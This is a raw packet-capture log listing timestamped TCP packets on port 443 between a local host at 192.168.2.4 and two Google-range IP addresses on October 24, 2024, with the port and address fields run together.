                                                                                                    Oct 24, 2024 08:46:11.997481108 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.997492075 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:11.997534990 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:11.997541904 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:12.000159979 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:12.000188112 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:12.000211000 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:12.000221014 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:12.000261068 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:12.003218889 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:12.003303051 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:12.003346920 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:12.003355980 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:12.003392935 CEST44349731142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:12.003452063 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:12.003864050 CEST49731443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:44.499520063 CEST49738443192.168.2.4142.250.185.142
                                                                                                    Oct 24, 2024 08:46:44.499571085 CEST44349738142.250.185.142192.168.2.4
                                                                                                    Oct 24, 2024 08:46:44.499665022 CEST49738443192.168.2.4142.250.185.142
                                                                                                    Oct 24, 2024 08:46:44.518471956 CEST49738443192.168.2.4142.250.185.142
                                                                                                    Oct 24, 2024 08:46:44.518510103 CEST44349738142.250.185.142192.168.2.4
                                                                                                    Oct 24, 2024 08:46:45.371767998 CEST44349738142.250.185.142192.168.2.4
                                                                                                    Oct 24, 2024 08:46:45.371959925 CEST49738443192.168.2.4142.250.185.142
                                                                                                    Oct 24, 2024 08:46:45.374324083 CEST44349738142.250.185.142192.168.2.4
                                                                                                    Oct 24, 2024 08:46:45.374397993 CEST49738443192.168.2.4142.250.185.142
                                                                                                    Oct 24, 2024 08:46:45.430780888 CEST49738443192.168.2.4142.250.185.142
                                                                                                    Oct 24, 2024 08:46:45.430819035 CEST44349738142.250.185.142192.168.2.4
                                                                                                    Oct 24, 2024 08:46:45.431830883 CEST44349738142.250.185.142192.168.2.4
                                                                                                    Oct 24, 2024 08:46:45.431955099 CEST49738443192.168.2.4142.250.185.142
                                                                                                    Oct 24, 2024 08:46:45.437804937 CEST49738443192.168.2.4142.250.185.142
                                                                                                    Oct 24, 2024 08:46:45.483324051 CEST44349738142.250.185.142192.168.2.4
                                                                                                    Oct 24, 2024 08:46:45.801724911 CEST44349738142.250.185.142192.168.2.4
                                                                                                    Oct 24, 2024 08:46:45.801901102 CEST49738443192.168.2.4142.250.185.142
                                                                                                    Oct 24, 2024 08:46:45.801918030 CEST44349738142.250.185.142192.168.2.4
                                                                                                    Oct 24, 2024 08:46:45.802001953 CEST49738443192.168.2.4142.250.185.142
                                                                                                    Oct 24, 2024 08:46:45.837613106 CEST49738443192.168.2.4142.250.185.142
                                                                                                    Oct 24, 2024 08:46:45.837682009 CEST44349738142.250.185.142192.168.2.4
                                                                                                    Oct 24, 2024 08:46:45.837747097 CEST49738443192.168.2.4142.250.185.142
                                                                                                    Oct 24, 2024 08:46:45.870855093 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:45.870881081 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:45.870943069 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:45.871179104 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:45.871191978 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:46.757539988 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:46.757776022 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:46.767332077 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:46.767350912 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:46.767616034 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:46.767673016 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:46.768212080 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:46.815367937 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.266212940 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.266357899 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.275197029 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.275279999 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.384336948 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.384463072 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.384474993 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.384514093 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.384521008 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.384566069 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.384572029 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.384639978 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.396047115 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.396111012 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.396152973 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.396204948 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.400773048 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.400835037 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.400883913 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.400933981 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.410237074 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.410295963 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.410305023 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.410347939 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.419840097 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.419892073 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.419918060 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.419961929 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.429394960 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.429455042 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.429482937 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.429532051 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.438776016 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.438956022 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.438980103 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.439027071 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.448446035 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.448508978 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.448544979 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.448586941 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.457899094 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.457962036 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.458023071 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.458067894 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.502820969 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.502926111 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.502952099 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.503000021 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.503009081 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.503046989 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.503053904 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.503091097 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.503583908 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.503624916 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.503638029 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.503674030 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.503680944 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.503715992 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.504450083 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.504493952 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.514584064 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.514674902 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.514698029 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.514741898 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.526597023 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.526669979 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.526684999 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.526731968 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.530153990 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.530230045 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.530242920 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.530293941 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.536921978 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.536982059 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.537005901 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.537054062 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.542924881 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.542984009 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.543004990 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.543052912 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.543087959 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.543139935 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.550112009 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.550177097 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.550206900 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.550257921 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.555502892 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.555563927 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.555584908 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.555634975 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.561342955 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.561403036 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.561417103 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.561463118 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.567574978 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.567650080 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.567670107 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.567759991 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.573664904 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.573757887 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.573765993 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.573813915 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.580059052 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.580164909 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.580173016 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.580215931 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.585922003 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.586014986 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.586116076 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.586165905 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.592365980 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.592437029 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.592448950 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.592494965 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.598360062 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.598434925 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.598442078 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.598480940 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.604664087 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.604722023 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.604728937 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.604774952 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.610645056 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.610703945 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.610711098 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.610752106 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.622266054 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.622333050 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.622370005 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.622410059 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.622925997 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.622967005 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.622975111 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.623024940 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.629045963 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.629117012 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.629205942 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.629374981 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.635065079 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.635139942 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.635148048 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.635200024 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.641055107 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.641119003 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.641134024 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.641181946 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.646733999 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.646792889 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.646832943 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.646883011 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.652299881 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.652370930 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.652384043 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.652431011 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.657886028 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.657948971 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.657968044 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.658015966 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.663433075 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.663492918 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.663513899 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.663609982 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.668977976 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.669116974 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.669123888 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.669167995 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.672846079 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.672903061 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.672930002 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.672979116 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.676139116 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.676193953 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.676239014 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.676284075 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.679702997 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.679757118 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.679784060 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.679836988 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.683283091 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.683373928 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.683394909 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.683515072 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.686640978 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.686707973 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.686742067 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.686791897 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.690155983 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.690335035 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.690356970 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.690402985 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.693272114 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.693325043 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.693358898 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.693408966 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.696737051 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.696789980 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.696818113 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.696866989 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.700640917 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.700799942 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.700809002 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.700851917 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.703037977 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.703134060 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.703141928 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.703186989 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.706147909 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.706202030 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.706291914 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.706336021 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.709418058 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.709466934 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.709564924 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.709609032 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.712625027 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.712672949 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.712707996 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.712749004 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.715853930 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.715905905 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.715914965 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.715965033 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.722424030 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.722470999 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.722480059 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.722521067 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.722527981 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.722559929 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.722574949 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.722613096 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.724793911 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.724848032 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.724854946 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.724900007 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.728152037 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.728203058 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.728234053 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.728282928 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.730988026 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.731041908 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.731069088 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.731120110 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.733771086 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.733834028 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.733872890 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.733922958 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.736752033 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.736802101 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.736834049 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.736879110 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.739758968 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.739809036 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.739882946 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.739928007 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.742760897 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.742820978 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.742866993 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.742912054 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.745368958 CEST44349739142.250.186.97192.168.2.4
                                                                                                    Oct 24, 2024 08:46:49.745423079 CEST49739443192.168.2.4142.250.186.97
                                                                                                    Oct 24, 2024 08:46:49.745472908 CEST44349739142.250.186.97192.168.2.4
